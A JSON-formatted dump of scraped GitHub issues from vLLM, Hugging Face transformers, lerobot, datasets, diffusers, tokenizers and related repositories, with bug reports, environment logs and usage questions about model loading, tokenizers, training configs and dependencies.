compilation_config={\"level\":3,\"debug_dump_path\":\"\",\"cache_dir\":\"\",\"backend\":\"\",\"custom_ops\":[],\"splitting_ops\":[\"vllm.unified_attention\",\"vllm.unified_attention_with_output\",\"vllm.mamba_mixer2\",\"vllm.mamba_mixer\",\"vllm.short_conv\",\"vllm.linear_attention\",\"vllm.plamo2_mamba_mixer\",\"vllm.gdn_attention\"],\"use_inductor\":true,\"compile_sizes\":[],\"inductor_compile_config\":{\"enable_auto_functionalized_v2\":false},\"inductor_passes\":{},\"cudagraph_mode\":1,\"use_cudagraph\":true,\"cudagraph_num_of_warmups\":1,\"cudagraph_capture_sizes\":[512,504,496,488,480,472,464,456,448,440,432,424,416,408,400,392,384,376,368,360,352,344,336,328,320,312,304,296,288,280,272,264,256,248,240,232,224,216,208,200,192,184,176,168,160,152,144,136,128,120,112,104,96,88,80,72,64,56,48,40,32,24,16,8,4,2,1],\"cudagraph_copy_inputs\":false,\"full_cuda_graph\":false,\"pass_config\":{},\"max_capture_size\":512,\"local_cache_dir\":null}\n(EngineCore_DP0 pid=1600151) WARNING 09-30 10:30:31 [multiproc_worker_utils.py:273] Reducing Torch parallelism from 64 threads to 1 to avoid unnecessary CPU contention. Set OMP_NUM_THREADS in the external environment to tune this value as needed.\n(EngineCore_DP0 pid=1600151) INFO 09-30 10:30:31 [shm_broadcast.py:289] vLLM message queue communication handle: Handle(local_reader_ranks=[0, 1, 2, 3, 4, 5, 6, 7], buffer_handle=(8, 16777216, 10, 'psm_7e0498ff'), local_subscribe_addr='ipc:///tmp/33a7ec3b-72b3-4984-9ed3-6fc1fb572c4a', remote_subscribe_addr=None, remote_addr_ipv6=False)\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:35 [__init__.py:216] Automatically detected platform cuda.\nINFO 09-30 10:30:40 [shm_broadcast.py:289] vLLM message queue communication handle: Handle(local_reader_ranks=[0], buffer_handle=(1, 10485760, 10, 'psm_1413bf45'), local_subscribe_addr='ipc:///tmp/a", "url": "https://github.com/vllm-project/vllm/issues/26607", "state": "open", "labels": [ "bug" ], "created_at": "2025-10-11T01:48:50Z", "updated_at": "2025-10-17T01:09:03Z", "comments": 0, "user": "tina0852" }, { "repo": "huggingface/hf-hub", "number": 131, "title": "InvalidCertificate and how to fix it", "body": "I am trying to install a DuckDB extension written in Rust (https://github.com/martin-conur/quackformers) that uses the library.\n\nDuring the install, I am getting a\n```\nHfHub(RequestError(Transport(Transport { kind: ConnectionFailed, message: Some(\"tls connection init failed\"), url: Some(Url { scheme: \"https\", cannot_be_a_base: false, username: \"\", password: None, host: Some(Domain(\"huggingface.co\")), port: None, path: \"/sentence-transformers/all-MiniLM-L6-v2/resolve/main/tokenizer.json\", query: None, fragment: None }), source: Some(Custom { kind: InvalidData, error: InvalidCertificate(UnknownIssuer) }) })))\n```\nThe file can be accessed from my environment via curl.\nThe file can be accessed from DuckDB using their `httpfs` extension which is written in C/C++.\n\nI am working in environment with a very strict enterprise proxy and this is most likely what's causing the issue (I have zero issue when running the same commands at home).\n\n1. can the behavior of HfHub with respect to proxy be modified using env variables?\n2. can the behavior of HfHub with respect to TLS certificates be modified using env variables? \n3. where can I find the default value(s) for the proxy settings and the location of certs used by the library\n\nReferences:\n- bug report for quackformer = https://github.com/martin-conur/quackformers/issues/7\n", "url": "https://github.com/huggingface/hf-hub/issues/131", "state": "open", "labels": [], "created_at": "2025-10-10T14:42:12Z", "updated_at": "2025-10-10T18:18:28Z", "user": "sahuguet" }, { "repo": "vllm-project/vllm", "number": 26585, "title": "[Usage]: use vllm embedding to extract last token hidden states?", "body": "### Your current environment\n\n```/usr/local/lib/python3.12/dist-packages/torch/cuda/__init__.py:63: FutureWarning: The pynvml package is deprecated. Please install nvidia-ml-py instead. If you did not install pynvml directly, please report this to the maintainers of the package that installed pynvml for you.\n import pynvml # type: ignore[import]\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.5 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : 14.0.0-1ubuntu1.1\nCMake version : version 3.21.0\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jun 4 2025, 08:56:18) [GCC 11.4.0] (64-bit runtime)\nPython platform : Linux-5.10.134-16.3.al8.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : GPU 0: NVIDIA H20-3e\nNvidia driver version : 570.133.20\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 192\nOn-line CPU(s) list: 0-191\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) PLATINUM 8575C\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 2\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 5600.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local split_lock_detect avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_notify hwp_act_window hwp_epp hwp_pkg_req hfi avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm uintr md_clear serialize tsxldtrk pconfig arch_lbr amx_bf16 avx512_fp16 amx_tile amx_int8 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 4.5 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 192 MiB (96 instances)\nL3 cache: 640 MiB (2 instances)\nNUMA node(s): 2\nNUMA node0 CPU(s): 0-47,96-143\nNUMA node1 CPU(s): 48-95,144-191\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling, PBRSB-eIBRS SW sequence\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] flashinfer-pytho", "url": "https://github.com/vllm-project/vllm/issues/26585", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-10T13:01:42Z", "updated_at": "2025-12-15T06:54:05Z", "comments": 2, "user": "rxqy" }, { "repo": "vllm-project/vllm", "number": 26582, "title": "[Bug]: which triton-kernels version for MXFP4 Triton backend?", "body": "### Your current environment\n\nvllm v0.11.0 installed via `uv pip install vllm --torch-backend=auto`\n\ntriton + triton-kernels at different commits installed from source\n\n### \ud83d\udc1b Describe the bug\n\n**Which triton + triton-kernels version does one have to install to run GPT-OSS with the MXFP4 Triton backend?**\n\nNo matter which version I try, I always get an error `Failed to import Triton kernels. Please make sure your triton version is compatible.`\n\nClearly, the latest triton-kernels will not work since the code in `vllm.model_executor.layers.fused_moe.gpt_oss_triton_kernels_moe` tries to import from `triton_kernels.routing`, but `triton_kernels.routing` has been deprecated (cf. https://github.com/triton-lang/triton/commit/30ede52aa2aecfd2ab3d6672ed21bbf4eb6438b3).\n\nBut also with older versions I get errors like `ImportError: cannot import name 'triton_key' from 'triton.compiler.compiler` or `Error: No module named 'triton.language.target_info`.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26582", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-10T11:51:59Z", "updated_at": "2025-12-12T20:30:06Z", "comments": 8, "user": "matkle" }, { "repo": "huggingface/lerobot", "number": 2162, "title": "[Question] How to suppress verbose Svt[info] logs from video encoding during save_episode()?", "body": "Hi, thank you for this fantastic library!\n\nI am currently using lerobot (Version: 0.3.3) to record and save robotics data. When I use the `dataset.save_episode() method`, I get a large number of verbose log messages prefixed with Svt[info]:\n\n```shell\nSvt[info]: ------------------------------------------- | 0/1 [00:00What is eunoia?\")\nprint(f\"{x1=}\")\n\nt2 = AutoTokenizer.from_pretrained(\"google/gemma-3-4b-it\")\nx2 = t2.tokenize(\"What is eunoia?\")\nprint(f\"{x2=}\")\n``` \n\n### Expected behavior\n\nThe print out of the x1 and x2 should be the same. However,\n\n```\nx1=['', 'Wh', 'at', '\u2581is', '\u2581eu', 'no', 'ia', '?']\nx2=['', 'What', '\u2581is', '\u2581e', 'uno', 'ia', '?']\n```\nLooking more into it, the tokenizer created for HF model (t2) is BPE while the tokenizer created for the GGUF model (t1) is Unigram.", "url": "https://github.com/huggingface/transformers/issues/41494", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-09T23:27:25Z", "updated_at": "2025-11-29T08:02:57Z", "comments": 4, "user": "amychen85" }, { "repo": "vllm-project/vllm", "number": 26530, "title": "[Bug]: Fix CVE-2023-48022 in docker image", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\nNot required for this.\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\nThe vllm/vllm-openai:v0.10.2 image seems to be affected by the [CVE-2023-48022](https://avd.aquasec.com/nvd/2023/cve-2023-48022/) **Critical** CVE with `ray` (see scan results below). Is there any plan to address this?\n\n```\ngrype vllm/vllm-openai:v0.10.2 --scope all-layers\n```\n\n```\nNAME INSTALLED FIXED IN TYPE VULNERABILITY SEVERITY EPSS RISK\nray 2.49.1 python GHSA-6wgj-66m2-xxp2 Critical 91.9% (99th) 86.4\nlibgssapi-krb5-2 1.19.2-2ubuntu0.4 1.19.2-2ubuntu0.5 deb CVE-2024-3596 Medium 24.6% (95th) 12.3\nlibk5crypto3 1.19.2-2ubuntu0.4 1.19.2-2ubuntu0.5 deb CVE-2024-3596 Medium 24.6% (95th) 12.3\nlibkrb5-3 1.19.2-2ubuntu0.4 1.19.2-2ubuntu0.5 deb CVE-2024-3596 Medium 24.6% (95th) 12.3\nlibkrb5support0 1.19.2-2ubuntu0.4 1.19.2-2ubuntu0.5 deb CVE-2024-3596 Medium 24.6% (95th) 12.3\npython3-pip 22.0.2+dfsg-1ubuntu0.6 22.0.2+dfsg-1ubuntu0.7 deb CVE-2023-32681 Medium 6.3% (90th) 3.1\nlibaom3 3.3.0-1ubuntu0.1 deb CVE-2019-2126 Low 8.1% (91st) 2.4\nlibcaca0 0.99.beta19-2.2ubuntu4 deb CVE-2022-0856 Low 4.9% (89th) 1.5\npython3-httplib2 0.20.2-2 deb CVE-2021-21240 Low 4.5% (88th) 1.4\nlogin 1:4.8.1-2ubuntu2.2 deb CVE-2024-56433 Low 3.6% (87th) 1.1\npasswd 1:4.8.1-2ubuntu2.2 deb CVE-2024-56433 Low 3.6% (87th) 1.1\n...\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26530", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-09T20:16:02Z", "updated_at": "2025-10-10T21:14:49Z", "comments": 3, "user": "geodavic" }, { "repo": "huggingface/lerobot", "number": 2156, "title": "How to reproduce lerobot/pi0_libero_finetuned?", "body": "Thanks for the great work!\n\nI evaluated lerobot/pi0_libero_finetuned on libero goal datasets.\nWhen using n_action_steps=50, the success rate is ~ 75%\nWhen using n_action_steps=10, the success rate is ~ 90%\n\nI tried to reproduce the training results, so I mainly refered to [train_config.json](https://huggingface.co/lerobot/pi0_libero_finetuned/blob/main/train_config.json) in the `lerobot/pi0_libero_finetuned` repo, which has one key value pair in the config dict:\n```\n\"pretrained_path\": \"pepijn223/pi0_libero_finetuned_extra\"\n```\n\nSo I also refered to the [train_config.json](https://huggingface.co/pepijn223/pi0_libero_finetuned_extra/blob/main/train_config.json) in th `pepijn223/pi0_libero_finetuned_extra` repo, which also has the key value pair:\n```\n\"pretrained_path\": \"lerobot/pi0_libero_finetuned\"\n```\nThis again points back to the checkpoint that depends on it.\n\nAnd my questions are, how are these checkpoints actually trained, and can anyone provide a train_config.json in the latest lerobot version that can reproduce lerobot/pi0_libero_finetuned?\n\nPlease also share some successful training configs if possible!", "url": "https://github.com/huggingface/lerobot/issues/2156", "state": "open", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-10-09T18:11:47Z", "updated_at": "2025-10-22T09:27:03Z", "user": "PuzhenYuan" }, { "repo": "huggingface/lerobot", "number": 2153, "title": "Why can\u2019t I find something like train_expert_only in the latest version of pi0? Do the current versions of pi0 and pi0.5 only support full-parameter training?", "body": "Why can\u2019t I find something like \u201ctrain_expert_only\u201d in the latest version of pi0?\nDo the current versions of pi0 and pi0.5 only support full-parameter training?", "url": "https://github.com/huggingface/lerobot/issues/2153", "state": "closed", "labels": [ "enhancement", "question", "policies", "good first issue" ], "created_at": "2025-10-09T13:08:10Z", "updated_at": "2025-12-31T14:54:29Z", "user": "ZHHhang" }, { "repo": "huggingface/datasets", "number": 7802, "title": "[Docs] Missing documentation for `Dataset.from_dict`", "body": "Documentation link: https://huggingface.co/docs/datasets/en/package_reference/main_classes\n\nLink to method (docstring present): https://github.com/huggingface/datasets/blob/6f2502c5a026caa89839713f6f7c8b958e5e83eb/src/datasets/arrow_dataset.py#L1029\n\nThe docstring is present for the function, but seems missing from the official documentation for the `Dataset` class on HuggingFace.\n\nThe method in question:\n```python\n @classmethod\n def from_dict(\n cls,\n mapping: dict,\n features: Optional[Features] = None,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n ) -> \"Dataset\":\n \"\"\"\n Convert `dict` to a `pyarrow.Table` to create a [`Dataset`].\n\n Important: a dataset created with from_dict() lives in memory\n and therefore doesn't have an associated cache directory.\n This may change in the future, but in the meantime if you\n want to reduce memory usage you should write it back on disk\n and reload using e.g. save_to_disk / load_from_disk.\n\n Args:\n mapping (`Mapping`):\n Mapping of strings to Arrays or Python lists.\n features ([`Features`], *optional*):\n Dataset features.\n info (`DatasetInfo`, *optional*):\n Dataset information, like description, citation, etc.\n split (`NamedSplit`, *optional*):\n Name of the dataset split.\n\n Returns:\n [`Dataset`]\n \"\"\"\n```", "url": "https://github.com/huggingface/datasets/issues/7802", "state": "open", "labels": [], "created_at": "2025-10-09T02:54:41Z", "updated_at": "2025-10-19T16:09:33Z", "comments": 2, "user": "aaronshenhao" }, { "repo": "huggingface/transformers", "number": 41431, "title": "gradient scaling occurs even though total gradient remains < max_grad_norm in trainer.py", "body": "Even though gradients remain < max_grad_norm throughout training, the gradient still goes through a scaling process. For instance, I set max_grad_norm = 1, and grad_norm consistently remains <= 0.33. Because the trainer takes you through the grad clip process if max_grad_norm > 0 or not None, this operation always gets executed within torch's clip function: `clip_coef = max_norm / (total_norm + 1e-6)`. Is there a way to prevent this? Thanks. \n\n", "url": "https://github.com/huggingface/transformers/issues/41431", "state": "closed", "labels": [], "created_at": "2025-10-07T22:13:08Z", "updated_at": "2025-11-15T08:02:51Z", "comments": 7, "user": "lorsonblair" }, { "repo": "huggingface/candle", "number": 3120, "title": "AutoModel / PreTrainedModel equivalent magic ?", "body": "Hello all, first, thanks a lot for this wonderful crate. \n\nI was wondering if it's on the roadmap or if there is a solution to have the same magic as in python with a `AutoModel.from_pretrained(\"the_model_name_string\")`\n\nAs I'm protoyping and am often changing models... which requires to change the architecture everytime and having this \"auto load\" would save time. \n\nAlternatives : https://github.com/lucasjinreal/Crane or https://docs.rs/kalosm/latest/kalosm/\n\nThanks in advance, \nHave a nice day. ", "url": "https://github.com/huggingface/candle/issues/3120", "state": "open", "labels": [], "created_at": "2025-10-07T21:27:31Z", "updated_at": "2025-10-09T13:02:35Z", "comments": 2, "user": "ierezell" }, { "repo": "huggingface/lerobot", "number": 2134, "title": "what is the transformers version for latest lerobot pi0?", "body": "### System Info\n\n```Shell\n- lerobot version: 0.3.4\n- Platform: Linux-5.4.0-148-generic-x86_64-with-glibc2.31\n- Python version: 3.10.18\n- Huggingface Hub version: 0.35.3\n- Datasets version: 4.1.1\n- Numpy version: 1.26.4\n- PyTorch version: 2.7.1+cu126\n- Is PyTorch built with CUDA support?: True\n- Cuda version: 12.6\n- GPU model: NVIDIA A800-SXM4-80GB\n- Using GPU in script?:\n\nlerobot-eval --policy.path=\"lerobot/pi0_libero_finetuned\" --env.type=libero --env.task=libero_goal --eval.batch_size=1 --eval.n_episodes=2 --seed=1000\n```\n\n### Information\n\n- [x] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nClone latest LeRobot repository and install dependencies and run lerobot_eval.py\n```\nlerobot-eval --policy.path=\"lerobot/pi0_libero_finetuned\" --env.type=libero --env.task=libero_goal --eval.batch_size=1 --eval.n_episodes=2 --seed=1000\n```\n```\nTraceback (most recent call last):\n File \"/cephfs/yuanpuzhen/conda_data/envs/libero/bin/lerobot-eval\", line 7, in \n sys.exit(main())\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/scripts/lerobot_eval.py\", line 750, in main\n eval_main()\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/configs/parser.py\", line 225, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/scripts/lerobot_eval.py\", line 495, in eval_main\n policy = make_policy(\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/policies/factory.py\", line 386, in make_policy\n policy = policy_cls.from_pretrained(**kwargs)\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 923, in from_pretrained\n model = cls(config, **kwargs)\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 872, in __init__\n self.model = PI0Pytorch(config)\n File \"/cephfs/yuanpuzhen/project/pi_space/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 545, in __init__\n raise ValueError(msg) from None\nValueError: An incorrect transformer version is used, please create an issue on https://github.com/huggingface/lerobot/issues\nException ignored in: \nTraceback (most recent call last):\n File \"/cephfs/yuanpuzhen/conda_data/envs/libero/lib/python3.10/site-packages/robosuite/utils/binding_utils.py\", line 199, in __del__\n self.gl_ctx.free()\n File \"/cephfs/yuanpuzhen/conda_data/envs/libero/lib/python3.10/site-packages/robosuite/renderers/context/egl_context.py\", line 150, in free\n EGL.eglDestroyContext(EGL_DISPLAY, self._context)\n File \"/cephfs/yuanpuzhen/conda_data/envs/libero/lib/python3.10/site-packages/OpenGL/error.py\", line 230, in glCheckError\n raise self._errorClass(\nOpenGL.raw.EGL._errors.EGLError: EGLError(\n err = EGL_NOT_INITIALIZED,\n baseOperation = eglDestroyContext,\n cArguments = (\n ,\n ,\n ),\n result = 0\n)\n```\n### Expected behavior\n\nExpect to evaluate the given checkpoint, output eval videos and eval_info.json\n\nCan you provide stable transformers and numpy versions for the latest lerobot?\n\nAnd what version of transformers could satisfied the code in PI0Pytorch?\n```\n try:\n from transformers.models.siglip import check\n\n if not check.check_whether_transformers_replace_is_installed_correctly():\n raise ValueError(msg)\n except ImportError:\n raise ValueError(msg) from None\n```", "url": "https://github.com/huggingface/lerobot/issues/2134", "state": "closed", "labels": [], "created_at": "2025-10-07T12:06:52Z", "updated_at": "2025-11-14T20:04:50Z", "user": "PuzhenYuan" }, { "repo": "huggingface/diffusers", "number": 12441, "title": "Support Wan2.2-Animate", "body": "[Wan2.2-Animate-14B](https://humanaigc.github.io/wan-animate), it's a unified model for character animation and replacement, with holistic movement and expression replication.\n\nhttps://github.com/user-attachments/assets/351227d0-4edc-4f6c-9bf9-053e53f218e4\n\nWe would like open to the community, if anyone is interested, to integrate this model with Diffusers. Just take into consideration these points:\n\n1. Don't integrate the preprocessing, we can help with that using a modular custom block.\n2. This issue is for more advanced users than know the diffusers library very well.\n\nJust let me know that you're interested and if you have any doubts, feel free to ask, if you open a PR we can help but we are currently busy with other priorities so we ask you to be patient.", "url": "https://github.com/huggingface/diffusers/issues/12441", "state": "closed", "labels": [ "help wanted", "contributions-welcome" ], "created_at": "2025-10-06T18:08:21Z", "updated_at": "2025-11-13T02:52:32Z", "comments": 0, "user": "asomoza" }, { "repo": "huggingface/lerobot", "number": 2124, "title": "Question regarding downsampling and resizing dataset", "body": "Hi,\n\nThank you for providing this wonderful library! I was curious about how one can take an existing dataset (collected or downloaded) and modify the fps (downsample, resize images, or delete specific episodes (for v3) prior to policy training. I am finding this tricky to do particularly when the dataset is not loaded in code but provided as a parameter to lerobot-train. I've spent time digging around the codebase but didn't see a way that doesn't involve loading the dataset in script first and adjusting this (for resizing, not sure about downsampling fps). Does the codebase provide utility functions for this? Thanks!", "url": "https://github.com/huggingface/lerobot/issues/2124", "state": "open", "labels": [ "question", "dataset", "good first issue" ], "created_at": "2025-10-06T16:07:47Z", "updated_at": "2025-10-07T20:25:20Z", "user": "karthikm-0" }, { "repo": "huggingface/transformers", "number": 41363, "title": "RT-Detr docs should reflect fixed 640x640 input size", "body": "The authors of RT-Detr mention that the model was trained on 640x640 images and was meant to be used for inference on 640x640 images. Also, the current implementation has certain quirks that make training/inferring on images of different sizes problematic. For example, the pixel masks used for batching images of varying sizes are discarded.\n\nhttps://github.com/huggingface/transformers/blob/0452f28544f3626273d25f07f83c0e5f7da2d47a/src/transformers/models/rt_detr/modeling_rt_detr.py#L1645\n\nThe above are not clear in the current docs. I'll open a PR which adds a few lines in the docs to notify users about these issues.", "url": "https://github.com/huggingface/transformers/issues/41363", "state": "closed", "labels": [ "Documentation" ], "created_at": "2025-10-06T11:04:37Z", "updated_at": "2025-11-06T13:24:01Z", "comments": 4, "user": "konstantinos-p" }, { "repo": "huggingface/tokenizers", "number": 1873, "title": "Why is my Python implementation faster than the Rust implementation?", "body": "I am comparing the tokenizers in the Python and the huggingface implementation as follows\n\n```python\nimport json\nimport time\nfrom transformers import AutoTokenizer\ntokenizer = AutoTokenizer.from_pretrained(\"bert-base-cased\")\n\n[... Define and save the texts as data.json]\nwith open('./data.json', 'w', encoding='utf-8') as f:\n json.dump(texts[:N], f, ensure_ascii=False)\n\nN = 500\nstart = time.time()\nfor text in texts:\n tokenizer(text)\nend = time.time()\nloop_time = end-start\nprint(\"Python in a loop: \",end-start, f\"for {N} examples.\")\n# Python in a loop: 4.231077432632446 for 500 examples.\n\nstart = time.time()\nresults = tokenizer(texts[:N])\nend = time.time()\nbatch_time = end-start\nprint(\"Python as a batch: \",batch_time, f\"for {N} examples.\") \n# Python as a batch: 0.86988 for 500 examples.\n\n```\nand the rust implementation\n\n```rust\nuse tokenizers::tokenizer::{Result as TokenizerResult, Tokenizer,Encoding};\nuse serde_json::Result as SerdeResult;\nuse std::time::Instant;\nuse std::fs::File;\nuse std::io::{BufReader,BufWriter, Write};\nuse std::any::type_name;\nuse rayon::prelude::*;\n\nfn main() -> TokenizerResult<()> {\n // needs http feature enabled\n let tokenizer = Tokenizer::from_pretrained(\"bert-base-cased\", None)?;\n \n let file = File::open(\"./data.json\")?;\n let reader = BufReader::new(file);\n let items: Vec = serde_json::from_reader(reader)?;\n let texts: Vec<&str> = items.iter().map(|s| s.as_str()).collect();\n\n let start = Instant::now();\n for name in texts.iter(){\n let encoding = tokenizer.encode(*name, false)?;\n }\n let duration = start.elapsed();\n println!(\"(1) Execution in loop: {:.6} seconds\", duration.as_secs_f64());\n // (1) Execution in loop: 29.867990 seconds\n\n let start = Instant::now();\n let encoded_items: Vec<_> = texts.par_iter().map(|name| tokenizer.encode(*name, false)).collect();\n let duration = start.elapsed();\n println!(\"(2) Execution with par_iter : time: {:.6} seconds\", duration.as_secs_f64());\n // (2) Execution with par_iter : 3.968467\n \n let start = Instant::now();\n let encoded_items: TokenizerResult> = tokenizer.encode_batch(items2.clone(), false);\n let duration = start.elapsed();\n println!(\"(3) Execution with encode_batch : time: {:.6} seconds\", duration.as_secs_f64());\n // (3) Execution with encode_batch : 3.968467 seconds\n \n\n let start = Instant::now();\n let encoded_items: TokenizerResult> = tokenizer.encode_batch_char_offsets(items2.clone(), false);\n let duration = start.elapsed();\n println!(\"(4) Execution with encode_batch_char_offsets : time: {:.6} seconds\", duration.as_secs_f64());\n // (4) Execution with encode_batch_char_offsets : 6.839765 seconds\n\n let start = Instant::now();\n let encoded_items: TokenizerResult> = tokenizer.encode_batch_fast(items2.clone(), false);\n let duration = start.elapsed();\n println!(\"(5) Execution with encode_batch_fast : time: {:.6} seconds\", duration.as_secs_f64());\n // (5) Execution with encode_batch_fast : 5.758732 seconds\n\n\n Ok(())\n}\n```\n\nYou see that Rust is 10 times slower in a loop and 3 times slower even when parallelization is used.\nWhat is the trick here? How can I make my Rust code as fast (or hopefully faster) than the python code?", "url": "https://github.com/huggingface/tokenizers/issues/1873", "state": "closed", "labels": [], "created_at": "2025-10-05T08:02:47Z", "updated_at": "2025-10-08T17:41:28Z", "comments": 4, "user": "sambaPython24" }, { "repo": "huggingface/transformers", "number": 41336, "title": "is there a bug in group_videos_by_shape for qwenvl video preprocessiong?", "body": "### System Info\n\nin src/transformers/video_utils.py,\ngroup_videos_by_shape\ngrouped_videos = {shape: torch.stack(videos, dim=0) for shape, videos in grouped_videos.items()}, where each video is of shape BTCHW. This will create a new dimension. \nHowever, in qwenvl video preprocess \n batch_size, grid_t, channel = patches.shape[:3]\nIt does not consider the additional dimension created in group_videos_by_shape\nI think we should use torch.cat, not torch.stack?\n@yonigozlan @molbap \n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nrunning video preprocessing with list of video inputs, each with different shape\n\n### Expected behavior\n\nrun without error", "url": "https://github.com/huggingface/transformers/issues/41336", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-03T22:26:26Z", "updated_at": "2025-10-03T22:44:43Z", "comments": 1, "user": "dichencd" }, { "repo": "huggingface/lerobot", "number": 2111, "title": "frame deletion", "body": "Great work on this project! I have a quick question - does LeRobotDataset support frame deletion? For example, in the DROID_lerobot dataset, the first few frames have an action value of 0 and I need to remove them.\nI'd appreciate any insights you can provide. Thank you for your time and help!", "url": "https://github.com/huggingface/lerobot/issues/2111", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-10-03T13:05:12Z", "updated_at": "2025-10-10T12:17:53Z", "user": "Yysrc" }, { "repo": "huggingface/lerobot", "number": 2108, "title": "HIL-SERL Transform order for (tanh \u2192 rescale) is reversed", "body": "In `TanhMultivariateNormalDiag`:\n\n```\ntransforms = [TanhTransform(cache_size=1)]\nif low is not None and high is not None:\n transforms.insert(0, RescaleFromTanh(low, high)) # puts Rescale *before* tanh\n\n```\n\nthis applies RescaleFromTanh then Tanh, which is backwards. should we change it to tanh first, then rescale?\n\nFix\n\n```\ntransforms = [TanhTransform(cache_size=1)]\nif low is not None and high is not None:\n transforms.append(RescaleFromTanh(low, high)) # tanh \u2192 rescale\n```\n\nAlso, when I tried to assign value for low, high. I got error:\n\n```\ntorch/distributions/transforms.py\", line 303, in domain\n domain = self.parts[0].domain\nAttributeError: 'RescaleFromTanh' object has no attribute 'domain'\n```\n\nMight be fixed by adding the following to `class RescaleFromTanh(Transform)`\n\n```\n# Required attributes for PyTorch Transform\nself.domain = constraints.interval(-1.0, 1.0)\nself.codomain = constraints.interval(low, 